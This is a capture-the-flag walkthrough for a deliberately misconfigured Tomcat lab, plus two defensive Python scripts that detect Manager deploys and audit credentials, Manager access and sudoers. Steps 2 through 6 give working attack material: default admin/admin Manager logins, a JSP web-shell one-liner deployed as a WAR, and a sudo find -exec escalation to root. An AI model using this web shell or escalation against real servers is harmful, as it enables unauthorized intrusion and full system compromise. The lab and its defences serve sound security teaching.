
Compromised 1

🔥 Can you compromise this misconfigured Tomcat server?

Medium · 07 Dec 2025 · Free Access · Solution Available

Dive into a realistic web application penetration testing scenario featuring Apache Tomcat. This server has been left with dangerous default configurations and sudo misconfigurations that could lead to complete system compromise. 🎯 Master the art of web application exploitation, WAR file deployment, and Linux privilege escalation in this hands-on challenge.

2 Flags · 40 Points · 52% Success Rate

This solution is for Flags Mode

This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.

Compromised 1 - Complete Solution Walkthrough

Step 1: Web Application Reconnaissance

  1. Start by scanning the target to identify open ports:
     nmap -sS -sV -Pn <target-ip>
  2. The scan reveals that ports 80 (HTTP) and 8080 (Apache Tomcat) are open.
  3. Navigate to the Tomcat web application:
     http://<target-ip>:8080

Step 2: Tomcat Manager Access

  1. Look for the Tomcat Manager application:
     http://<target-ip>:8080/manager/html
  2. Try common default credentials:
     Username: admin
     Password: admin
  3. Successfully access the Tomcat Manager interface.

Step 3: WAR File Deployment

  1. Create a simple JSP web shell (note: reverse shells won't work because outbound traffic is blocked):
     mkdir webshell
     cd webshell
     echo '<%@ page import="java.io.*" %><% String cmd = request.getParameter("cmd"); if(cmd != null) { Process p = Runtime.getRuntime().exec(cmd); BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream())); String line; while((line = reader.readLine()) != null) { out.println(line + "<br/>"); } } %>' > shell.jsp
     jar -cvf ../shell.war *
     cd ..
  2. Deploy the WAR file through the Tomcat Manager interface.
  3. Access your deployed web shell:
     http://<target-ip>:8080/shell/shell.jsp?cmd=whoami
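
From the defender's side, the deploy-then-shell sequence in Step 3 leaves a recognisable trail in Tomcat's access log. The Python script below is an added example written for this page, not part of the original walkthrough and not Tomcat's own tooling: it parses access-log lines in Tomcat's default AccessLogValve "common" pattern and raises three kinds of finding: a POST/PUT to a Manager deploy endpoint, any Manager request from a non-loopback client, and a JSP requested with a cmd parameter. The sample log lines, client addresses and rule names are constructed for the example.

```python
import ipaddress
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines (not real lab data) in Tomcat's default AccessLogValve
# pattern: host ident user [time] "request" status bytes
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [07/Dec/2025:10:01:12 +0000] "GET /index.jsp HTTP/1.1" 200 1043
10.0.0.5 - - [07/Dec/2025:10:02:40 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - admin [07/Dec/2025:10:02:45 +0000] "GET /manager/html HTTP/1.1" 200 18934
10.0.0.5 - admin [07/Dec/2025:10:03:10 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABCD HTTP/1.1" 200 19102
10.0.0.5 - - [07/Dec/2025:10:03:30 +0000] "GET /shell/shell.jsp?cmd=whoami HTTP/1.1" 200 31
10.0.0.5 - - [07/Dec/2025:10:04:02 +0000] "GET /shell/shell.jsp?cmd=sudo%20-l HTTP/1.1" 200 412
10.0.0.7 - - [07/Dec/2025:10:05:00 +0000] "GET /docs/intro.html HTTP/1.1" 200 5110
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Manager endpoints through which a WAR can be deployed (HTML form, text API, legacy path)
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy", "/manager/deploy")


def parse_line(line):
    """Return the parsed fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_loopback(ip):
    """True for 127.0.0.0/8 and ::1; unparsable addresses are treated as remote."""
    try:
        return ipaddress.ip_address(ip).is_loopback
    except ValueError:
        return False


def detect(log_text):
    """Scan access-log text and return one finding per (line, rule) match."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        path, query = url.path, parse_qs(url.query)
        rules = []
        # Rule 1: WAR deployment through the Manager application
        if rec["method"] in ("POST", "PUT") and path.startswith(DEPLOY_PATHS):
            rules.append("manager_deploy")
        # Rule 2: Manager reached from a non-loopback client. If policy limits the
        # Manager to trusted addresses, every such request is worth a look.
        if path.startswith("/manager/") and not is_loopback(rec["ip"]):
            rules.append("manager_remote_access")
        # Rule 3: a JSP invoked with a 'cmd' parameter, the signature of the shell above
        if path.lower().endswith(".jsp") and "cmd" in query:
            rules.append("jsp_command_parameter")
        for rule in rules:
            findings.append({"line": n, "rule": rule, "ip": rec["ip"],
                             "user": rec["user"], "target": rec["target"],
                             "status": int(rec["status"])})
    return findings


def summarize(findings):
    """Count findings per rule, e.g. to decide which ones page an on-call analyst."""
    return dict(Counter(f["rule"] for f in findings))


if __name__ == "__main__":
    hits = detect(SAMPLE_ACCESS_LOG)
    for f in hits:
        print(f"line {f['line']:>2} {f['rule']:<24} {f['ip']:<10} {f['user']:<6} {f['target']}")
    print(summarize(hits))
```

Run against the sample, the script reports the two Manager logins, the upload and both web-shell requests; the ordinary page views produce nothing. A 401 on the Manager counts too, since a failed login from an unexpected address is exactly the credential guessing that Step 2 relies on.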

Step 4: Initial System Access

  1. Verify you have command execution as the 'hacker' user:
     http://<target-ip>:8080/shell/shell.jsp?cmd=id
  2. Retrieve the user flag:
     http://<target-ip>:8080/shell/shell.jsp?cmd=cat /home/flag-user.txt

Step 5: Privilege Escalation Enumeration

  1. Check sudo privileges for the current user:
     http://<target-ip>:8080/shell/shell.jsp?cmd=sudo -l
  2. The output shows that the hacker user can run /usr/bin/find as root without a password.

Step 6: Root Flag Retrieval

  1. With root privileges, retrieve the root flag:
     http://<target-ip>:8080/shell/shell.jsp?cmd=sudo%20find%20/root%20-name%20flag-root.txt%20-exec%20cat%20%7B%7D%20%2B
  2. You now have both user and root flags, completing the challenge.

Security Implications and Lessons Learned

  • Default Credentials: Using default credentials like admin/admin makes web applications vulnerable to unauthorized access
  • Tomcat Manager Exposure: Exposing the Tomcat Manager interface without proper access controls allows attackers to deploy malicious applications
  • Sudo Misconfigurations: Granting sudo access to powerful binaries like find can lead to privilege escalation
  • Defense: Change default credentials, restrict manager access, and carefully configure sudo permissions
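
The three weaknesses listed above, the admin/admin credentials of Step 2, the Manager reachable from anywhere, and the passwordless sudo rule for find found in Step 5, can each be checked mechanically. The Python script below is an added example written for this page, not Tomcat's or the lab's own code: it audits a tomcat-users.xml for Manager-role users with well-known or weak passwords, checks whether the Manager context.xml carries a RemoteAddrValve, and flags NOPASSWD sudoers rules. A weak and a hardened variant of each file are embedded as constructed samples; the 'deployer' account and its password are invented placeholders, and the allow-list in the restricted context is the loopback-only pattern Tomcat ships by default.

```python
import re
import xml.etree.ElementTree as ET

MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status"}
# Credential pairs that must never unlock the Manager: admin/admin is the pair used in the
# walkthrough; tomcat/s3cret is the commented-out example in Tomcat's stock tomcat-users.xml.
DEFAULT_CREDENTIALS = {("admin", "admin"), ("tomcat", "tomcat"), ("tomcat", "s3cret")}
MIN_PASSWORD_LENGTH = 12

# --- Constructed samples (not the lab's files): weak configuration beside a hardened one ---
WEAK_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/><role rolename="manager-script"/>
  <user username="admin" password="admin" roles="manager-gui,manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
</tomcat-users>"""
HARDENED_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-script"/>
  <user username="deployer" password="Qv7!m2Lp9xZr4tWb" roles="manager-script"/>
</tomcat-users>"""  # 'deployer' and its password are invented placeholders
# Manager context (webapps/manager/META-INF/context.xml): no valve vs. loopback-only valve
UNRESTRICTED_MANAGER_CONTEXT = '<Context antiResourceLocking="false" privileged="true"/>'
RESTRICTED_MANAGER_CONTEXT = r"""<Context antiResourceLocking="false" privileged="true">
  <Valve className="org.apache.catalina.valves.RemoteAddrValve"
         allow="127\.\d+\.\d+\.\d+|::1|0:0:0:0:0:0:0:1"/>
</Context>"""
WEAK_SUDOERS = "hacker ALL=(ALL) NOPASSWD: /usr/bin/find\n"
HARDENED_SUDOERS = "Defaults use_pty\n%admin ALL=(ALL:ALL) ALL   # password always required\n"


def _local(tag):
    """Strip the XML namespace prefix from an element tag."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return a list of issues for users who hold a Manager role in tomcat-users.xml."""
    issues = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        name, pw = el.get("username", ""), el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        if not roles & MANAGER_ROLES:
            continue  # only Manager accounts can deploy code, so only they are audited
        if (name, pw) in DEFAULT_CREDENTIALS:
            issues.append(f"{name}: default credential pair")
        elif pw == name:
            issues.append(f"{name}: password equals username")
        elif len(pw) < MIN_PASSWORD_LENGTH:
            issues.append(f"{name}: password shorter than {MIN_PASSWORD_LENGTH}")
        # Tomcat's Manager docs recommend not giving one user both the GUI and script roles
        if "manager-gui" in roles and "manager-script" in roles:
            issues.append(f"{name}: holds both manager-gui and manager-script")
    return issues


def manager_access_restricted(context_xml):
    """True when the Manager context declares a RemoteAddrValve with a non-empty allow list."""
    for el in ET.fromstring(context_xml).iter("Valve"):
        if el.get("className", "").endswith(".RemoteAddrValve") and el.get("allow", "").strip():
            return True
    return False


# user/group  host = (runas) command-spec
SUDO_RULE = re.compile(r"^(?P<who>\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(?P<spec>.+)$")


def audit_sudoers(text):
    """Flag passwordless sudo rules; find is rated critical because -exec runs arbitrary commands."""
    issues = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = SUDO_RULE.match(line)
        if not m or "NOPASSWD" not in m["spec"]:
            continue
        for cmd in (c.strip() for c in m["spec"].split("NOPASSWD:", 1)[1].split(",")):
            binary = cmd.split()[0].rsplit("/", 1)[-1] if cmd else ""
            sev = "critical" if binary in ("find", "ALL") else "warning"
            issues.append(f"{sev}: {m['who']} may run '{cmd}' without a password")
    return issues


if __name__ == "__main__":
    for label, users, ctx, sudo in (
        ("weak", WEAK_TOMCAT_USERS, UNRESTRICTED_MANAGER_CONTEXT, WEAK_SUDOERS),
        ("hardened", HARDENED_TOMCAT_USERS, RESTRICTED_MANAGER_CONTEXT, HARDENED_SUDOERS),
    ):
        print(f"[{label}] users: {audit_tomcat_users(users)}")
        print(f"[{label}] manager restricted to allow-list: {manager_access_restricted(ctx)}")
        print(f"[{label}] sudo: {audit_sudoers(sudo)}")
```

The weak set reproduces the lab's state (default credentials, open Manager, passwordless find) and the hardened set passes every check. The sudo parser is deliberately narrow: it reads plain user or group rules and skips Defaults lines, so aliases and includes need a real sudoers parser or `sudo -l` output.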

Tools and Techniques Summary

  • nmap: Network reconnaissance and port scanning
  • JSP web shells: Custom web shell creation for command execution
  • Tomcat Manager: Web application deployment interface
  • find binary: Exploiting sudo misconfigurations for privilege escalation